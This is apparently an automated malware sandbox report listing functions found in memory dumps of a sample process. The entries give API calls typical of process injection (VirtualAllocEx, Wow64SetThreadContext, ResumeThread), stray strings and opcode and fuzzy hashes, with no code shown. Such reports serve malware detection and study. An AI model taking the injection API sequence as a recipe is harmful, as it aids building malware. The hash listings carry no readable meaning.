                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00EC6D9A
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 838cc203262085765ebd87f2480eb728540ab0f5961a5e9e5070fb5ec5eb5520
                                      • Instruction ID: de865597dbc9dd0350cd9d78b468e9bfb415861d3bdf948a0a8fca9bca22d9da
                                      • Opcode Fuzzy Hash: 838cc203262085765ebd87f2480eb728540ab0f5961a5e9e5070fb5ec5eb5520
                                      • Instruction Fuzzy Hash: 5C4199B8D042589FCF10CFA9D984ADEBBB1FF49314F10A42AE815B7200D735A916CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00EC6BAF
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 076ece61bb366faa3d0d36b99f5450a074784958aad0d3efd2a11e9d7f8d7230
                                      • Instruction ID: 4a44f421dbbab6def452b5805e4a4272e45e23fc4886f9465da2353caf466e71
                                      • Opcode Fuzzy Hash: 076ece61bb366faa3d0d36b99f5450a074784958aad0d3efd2a11e9d7f8d7230
                                      • Instruction Fuzzy Hash: 2941DCB4D042589FCF10CFA9D984AEEFBB1EF49314F24842AE419B7240D739A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00EC6BAF
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 6a2232b34a3c10ff19a3ecc22d73897463133c50967dfa740400e81e8e90d0dd
                                      • Instruction ID: 69473e233d45bdb703ec6001351f282eacd12eaec27aeebb91d9db0ac299f845
                                      • Opcode Fuzzy Hash: 6a2232b34a3c10ff19a3ecc22d73897463133c50967dfa740400e81e8e90d0dd
                                      • Instruction Fuzzy Hash: AA41ACB4D002589FCB14CFA9D984AEEFBB1EF49314F24942AE418B7240D779A946CF64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 00EC6A5E
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: ff458f9cd616dd2e4ffe330ebae25595ce3f3234ef8cda759df41ec5d80bf027
                                      • Instruction ID: e698e29073994993ff6e92ce90465c01d7e1258a7cdbc0aad07fda9c99f53937
                                      • Opcode Fuzzy Hash: ff458f9cd616dd2e4ffe330ebae25595ce3f3234ef8cda759df41ec5d80bf027
                                      • Instruction Fuzzy Hash: 2831AAB4D01218AFCF14CFA9E984ADEFBB5EF49314F14942AE815B7200D775A902CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ResumeThread.KERNELBASE(?), ref: 00EC6A5E
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1050454587.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_ec0000_mum.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 453058e7c63292fd28119bba289af1dea0d03ec50fa157cfaafaedd0ade487b5
                                      • Instruction ID: 78012953f5bf0bf5a70e843ba0acb01b8340610a3305c0769754da51ce39a754
                                      • Opcode Fuzzy Hash: 453058e7c63292fd28119bba289af1dea0d03ec50fa157cfaafaedd0ade487b5
                                      • Instruction Fuzzy Hash: 913199B4D012189FCF14CFA9D984A9EFBB5EF49314F14942AE815B7340D775A902CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: 3aa7756629bb4540b9b5aada3e01a20b04d45172b873c7b871ee9ba1e258afde
                                      • Instruction ID: 8fcffb8073cbd777374acf3142fbf0d02c72e1297986271bbfc8ac294a5ec30a
                                      • Opcode Fuzzy Hash: 3aa7756629bb4540b9b5aada3e01a20b04d45172b873c7b871ee9ba1e258afde
                                      • Instruction Fuzzy Hash: BF51F330A24611CBDB348FA8D848BBAB7F2EF45701F14827EE86ADB291D3748C64D715
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 48l
                                      • API String ID: 0-3926459034
                                      • Opcode ID: b8d17a7c93f21fd13e301422d5dc176af88d4ab2b5f7cae6b0c31295ff15bcb3
                                      • Instruction ID: 10837bbb7ff2d188c80e3d816641fea1bd52d290ef2e0c84cf5f3c1644739ac4
                                      • Opcode Fuzzy Hash: b8d17a7c93f21fd13e301422d5dc176af88d4ab2b5f7cae6b0c31295ff15bcb3
                                      • Instruction Fuzzy Hash: AE41F530A20A26CFDB148FA8C855FBEB7B5FB45340F14466EE001D76A1DB74E9A0CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_5120000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: B-z
                                      • API String ID: 0-1806057957
                                      • Opcode ID: 559196fb4f0d3e7849aafc2043648ac6da7fe25bd14fe1a08d1a3c78ae21b9a8
                                      • Instruction ID: 508d73af72e2a8a3d92302bf935d5b094da8c4c85cc49b4b408a87ecdfc5bad3
                                      • Opcode Fuzzy Hash: 559196fb4f0d3e7849aafc2043648ac6da7fe25bd14fe1a08d1a3c78ae21b9a8
                                      • Instruction Fuzzy Hash: 4D212A74E092298BCB18DFA9C8456EEBBB6EB89300F04942AD419B3394DF345961CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (Fl
                                      • API String ID: 0-3640630996
                                      • Opcode ID: 1581e99e9990c4f5063a3e34394acb0acb16ce6c452c3a878175b09c38202e6a
                                      • Instruction ID: 510d8077c2a738fabfbc7a32b414dfc32b01847099dc52bc038364fcc4438169
                                      • Opcode Fuzzy Hash: 1581e99e9990c4f5063a3e34394acb0acb16ce6c452c3a878175b09c38202e6a
                                      • Instruction Fuzzy Hash: 1A11B1323204118FC764DB79D851E6973E5EF8A75431181BAF50ACB772DA30DC618B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: 673cf724546a0a6ab9be67d22066fdeb5556a0bd3c77346ae663f7d442b4fae7
                                      • Instruction ID: 902483f32761cfea080d5e5121ae85a0ca5fc54d7bf237533b0c8b5b28ee470b
                                      • Opcode Fuzzy Hash: 673cf724546a0a6ab9be67d22066fdeb5556a0bd3c77346ae663f7d442b4fae7
                                      • Instruction Fuzzy Hash: 32D05B3015520CEFD714DFA5D808FA977ACEB06305F145B98A40A53551C7B45E31DFD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2
                                      • API String ID: 0-450215437
                                      • Opcode ID: 98317b7142177798ae5fb294a22afe56c307d4de19219facab1bcbd38123bd8f
                                      • Instruction ID: 6dc91d7b6471a7fd793f5df58ae198c025a3981e6c44d342855a503f8d2e0ef1
                                      • Opcode Fuzzy Hash: 98317b7142177798ae5fb294a22afe56c307d4de19219facab1bcbd38123bd8f
                                      • Instruction Fuzzy Hash: 0CD0A7305AA108F6CA00DBA5E809FAA736CC701309F101B5C9409231518AB01F60EE81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 7f043fa9d6aff93343ab68b6c1740b355f181fe0d66df58200b0c4ec302786bb
                                      • Instruction ID: 6c1ceaf5235d625c04315e6c5be356cc890b6179056b8cecae7f421c57789187
                                      • Opcode Fuzzy Hash: 7f043fa9d6aff93343ab68b6c1740b355f181fe0d66df58200b0c4ec302786bb
                                      • Instruction Fuzzy Hash: ACD0A730469108E7D600FBE5D815FBF776C8B02705F100A8C950B539518AF40F20DAC5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )
                                      • API String ID: 0-2427484129
                                      • Opcode ID: 3b8ec00a030f796b073ea0c36fde9f4092496f40a26d6f114a22002dd3453169
                                      • Instruction ID: 1cd754a6860247246a10f97276c0ff70f62eca770d7efa8ff5b0c8fa973218ee
                                      • Opcode Fuzzy Hash: 3b8ec00a030f796b073ea0c36fde9f4092496f40a26d6f114a22002dd3453169
                                      • Instruction Fuzzy Hash: 1DD05E30119208EBD604DBA5D808BA9B76C9B06306F144658A40A5325187B40E30ABD5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 83c2d0cf13d842df52b5652f68d09c8510ed06e5a1877cfd7cfb43e6d494c991
                                      • Instruction ID: aeec544db989a240eac9e94d208cd8b46c6c353472488c18b7c325e3d6f24454
                                      • Opcode Fuzzy Hash: 83c2d0cf13d842df52b5652f68d09c8510ed06e5a1877cfd7cfb43e6d494c991
                                      • Instruction Fuzzy Hash: 36F1C474A002188FDB94DF68C991BDDB7B2EB89304F1084EAE90DA7355DB319E82CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3293b71d73754140dfb29e6536aae1de8181521fd4068ddd56f11f92f1d4bd6d
                                      • Instruction ID: 76bb62fa7b38b3405269aee7417e2441b3031d86aa804568dd6920d827285ff6
                                      • Opcode Fuzzy Hash: 3293b71d73754140dfb29e6536aae1de8181521fd4068ddd56f11f92f1d4bd6d
                                      • Instruction Fuzzy Hash: 8981E774A142188FDB50DFA8C881B9DBBF6FB49314F2481A9D919AB346D731ED82CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 57eb403a3b00ef097b89b39059a3f3c1c38eb025138b5189051bb672d7fdaad3
                                      • Instruction ID: d544647518f0443cf63f7667f04a36977da652665fddff172f1a739db60644fd
                                      • Opcode Fuzzy Hash: 57eb403a3b00ef097b89b39059a3f3c1c38eb025138b5189051bb672d7fdaad3
                                      • Instruction Fuzzy Hash: B2516B70A24619CBCB04CF64C545FAEF7B2EF44305F14862AE456AB292C774E860CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1e7a549a104beca942c326f28dc02c6ff9ccc628b94c1a751a9755a35de30ffc
                                      • Instruction ID: 0c1bab77a150948cdc9c73fc3af31e5dfe611de010bb947501a99ab764540ddb
                                      • Opcode Fuzzy Hash: 1e7a549a104beca942c326f28dc02c6ff9ccc628b94c1a751a9755a35de30ffc
                                      • Instruction Fuzzy Hash: A371C574A002198FDB55CF98C881FAAB7B2FF49304F148599E919AB356CB31EE41CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fdcaa079ba7dab17316958b515f5717377644d212250c0feb2b3042a8020e3d2
                                      • Instruction ID: e8e5ae5da133f30a337061853e74da264de424ead3185e25b9c118802e79f854
                                      • Opcode Fuzzy Hash: fdcaa079ba7dab17316958b515f5717377644d212250c0feb2b3042a8020e3d2
                                      • Instruction Fuzzy Hash: CC418174D25629DFCB00CFA8D984AEDBBF4AB0D300F245669D819F3300E771AA919F54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 676b870b70cafa5ced2724449b6b8e7fb4ca9e35da3fe5954f1c00eae86819e9
                                      • Instruction ID: 51c7ac71e680bc19a30dd9645404ee2bd927ed98e609c8fd44c635f8c7dadf57
                                      • Opcode Fuzzy Hash: 676b870b70cafa5ced2724449b6b8e7fb4ca9e35da3fe5954f1c00eae86819e9
                                      • Instruction Fuzzy Hash: 4F41D934A042189FDB50DF58CD91B99BBB6FB89314F1481E9E90D97345CB31AE82CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1056086461.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_5120000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 45533cdb2cb6fe6104aac4182c9c83753ad9e35986991f8dd16307cd40812293
                                      • Instruction ID: 555fc52167a331d56bdf6ab4e34964a2e0b51fe6ebdb34a8fe11be17e19f2a58
                                      • Opcode Fuzzy Hash: 45533cdb2cb6fe6104aac4182c9c83753ad9e35986991f8dd16307cd40812293
                                      • Instruction Fuzzy Hash: 9241F07498A268CFEF64DF24CC4C7AABBB2BB48302F1081E9D40DA6250DB755A95CF04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa6adf726f73d95bba25fe3405dfc217fb8726132f88f7fd14fb046fd58f2f02
                                      • Instruction ID: 0bde1d51bb354667f6bb568d6b2b08e5ddeeff152006cc167db86e9b32d483f8
                                      • Opcode Fuzzy Hash: fa6adf726f73d95bba25fe3405dfc217fb8726132f88f7fd14fb046fd58f2f02
                                      • Instruction Fuzzy Hash: AC41C274E10218DFDB50DFA8C891B9EBBB1FB49304F14819AE909A7345DB31AE868F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 834063ea4e9d77e6e3dbf1ba333e0f7cc694cd8307290e3d3135342271e695ce
                                      • Instruction ID: 9472f6744c2aaa3074e13f36d2041eba1fa2e2a881927fe11dce210b3097aef6
                                      • Opcode Fuzzy Hash: 834063ea4e9d77e6e3dbf1ba333e0f7cc694cd8307290e3d3135342271e695ce
                                      • Instruction Fuzzy Hash: AE313D70A10B46CBD770DF2AC844B6AB7F2FB84320F20872DD46A97690DB74A855CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8c372725ef2dc29a9c3ba1e4a7206e445be1f67c0524a76e70f954737e9d8e4
                                      • Instruction ID: e631c0f227f2f61a0004508221f60a3f11a7ff18b6f7cc168b77b3cfb336d71c
                                      • Opcode Fuzzy Hash: e8c372725ef2dc29a9c3ba1e4a7206e445be1f67c0524a76e70f954737e9d8e4
                                      • Instruction Fuzzy Hash: 5D31E274A2421ECBDB10DF64D848BADBBF6FB48300F1056AAD40AE7254EB708E949F41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_bd000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 93b3af5083d33a215b66b756fc43b8cbc8c0d05fc2887b7ae974d938a84b017a
                                      • Instruction ID: 083f1fdfbc99fdfe6b78b2a1a261a20a6e60db9de1e6602e6b6df959e5442df3
                                      • Opcode Fuzzy Hash: 93b3af5083d33a215b66b756fc43b8cbc8c0d05fc2887b7ae974d938a84b017a
                                      • Instruction Fuzzy Hash: 44210475604204DFCB24EF14D884B6AFBA5FB88314F34C5AAE9094B246D33AD857CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_bd000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8aa9faca7e18df5488d85cfc5c364a36a07731adbfeffee0b1d4d04dbbcdceae
                                      • Instruction ID: cc63e88198d15bcf0d8d71e7cea4ce813413551748eb3f7ab5706d8c656f122f
                                      • Opcode Fuzzy Hash: 8aa9faca7e18df5488d85cfc5c364a36a07731adbfeffee0b1d4d04dbbcdceae
                                      • Instruction Fuzzy Hash: DB214670604284EFCB55CF10D9C0B6AFBA5FBA8318F30C5AEE9094B242D336D856CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 265aaa2a881e8918953a2ee696a3fc019debe129286844f7c9df2760a4c3fbef
                                      • Instruction ID: 039e82b332d33a2a1cda121eb2214a6e3e070b758a1c35ef81588905d6e5637e
                                      • Opcode Fuzzy Hash: 265aaa2a881e8918953a2ee696a3fc019debe129286844f7c9df2760a4c3fbef
                                      • Instruction Fuzzy Hash: B0219374D25619DFCB00CFAAD884AEDBBF1AF5C310F249669D809F7200E771A9919F50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4d162d3f88c5840534b2cbf8e28c475a280a8f1c09b3a88c4d510b288db3cdd1
                                      • Instruction ID: e1d7663c37355dd2c0e4639bc283bca935411b2a025d9d9898cf433c57550894
                                      • Opcode Fuzzy Hash: 4d162d3f88c5840534b2cbf8e28c475a280a8f1c09b3a88c4d510b288db3cdd1
                                      • Instruction Fuzzy Hash: 7121E974E25519DFCB00CFA9D5409EEBBF5EB49300F20962AE916B3301D770A991CFA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d5c6b8a48c92c48a24bf9e7ea4f088089184b56b1752e30a44bb327e599e07e2
                                      • Instruction ID: 27c882d8bc059e3b0e6788c303c9ceaa8bd95387925d947425cd8c17744cb337
                                      • Opcode Fuzzy Hash: d5c6b8a48c92c48a24bf9e7ea4f088089184b56b1752e30a44bb327e599e07e2
                                      • Instruction Fuzzy Hash: C0119A357641504FC744EB78D498E5A3BE29FDE32531201B8E60ACB3A2EE24DC42CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_bd000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d57df4eb4c85d0f0bd9e91e84ecc4d9573ec1417b5af9858cc1931e35c12df11
                                      • Instruction ID: 40104473497dd4fc686ae3a78296c22ae04c53bbbba696a3c6e5408349ebdcb1
                                      • Opcode Fuzzy Hash: d57df4eb4c85d0f0bd9e91e84ecc4d9573ec1417b5af9858cc1931e35c12df11
                                      • Instruction Fuzzy Hash: A1217F755083809FCB02DF14D994B11BFB1EB46314F28C5EAD8498B266D33A981ACB62
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9b5d0b8e3ce7e3da1155780b4f03160eb2198bc29e867d034a1f1eac5b361ecd
                                      • Instruction ID: 8c6ac444fb7c4e3022546503d51da0e7dea75d46e3227845b48ba970fcd55820
                                      • Opcode Fuzzy Hash: 9b5d0b8e3ce7e3da1155780b4f03160eb2198bc29e867d034a1f1eac5b361ecd
                                      • Instruction Fuzzy Hash: 5B217F7092424ACFCB10CFA8D888AEDBBF9BB09300F50166AD455EB351EB70CE94DB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8e335296d4f1de90c5b84ac4df20ab1d47c45c6ac663c69402ef2979299c23cc
                                      • Instruction ID: acfe812a1bc00e86a26e68a4e77de7781aa5e913fc2edb45db2cbc567fe961f4
                                      • Opcode Fuzzy Hash: 8e335296d4f1de90c5b84ac4df20ab1d47c45c6ac663c69402ef2979299c23cc
                                      • Instruction Fuzzy Hash: 8F1129303041466BD7489BB899516AFB75FAFCA340F18C12EA10ACB257DF704C0183A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 59a597c3b440ff2493673e591e12490fca1e9e26c8ce6c091877b7c7fb72e5fa
                                      • Instruction ID: c9387a2a965b7e69882b8b32cea8d90585466b03030b7e982b81c885ab35db18
                                      • Opcode Fuzzy Hash: 59a597c3b440ff2493673e591e12490fca1e9e26c8ce6c091877b7c7fb72e5fa
                                      • Instruction Fuzzy Hash: 8201083032400A9BD74CABA89951B6EA68FAFC9340F24C53DA10BCB799DF748C1147E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 39e8d577042bad895acc897859a9844c75551a4391df36dbd6177609265cb1af
                                      • Instruction ID: 717dd6ca05e58f9859a1a9c58c95e453852c31cd3e9f73369a6516ef369a7d3d
                                      • Opcode Fuzzy Hash: 39e8d577042bad895acc897859a9844c75551a4391df36dbd6177609265cb1af
                                      • Instruction Fuzzy Hash: 52115E70D2460DCBDB00CFA9D848BEDB7F9AF49300F10966AD409D7250EBB09A94CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1046905033.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_bd000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
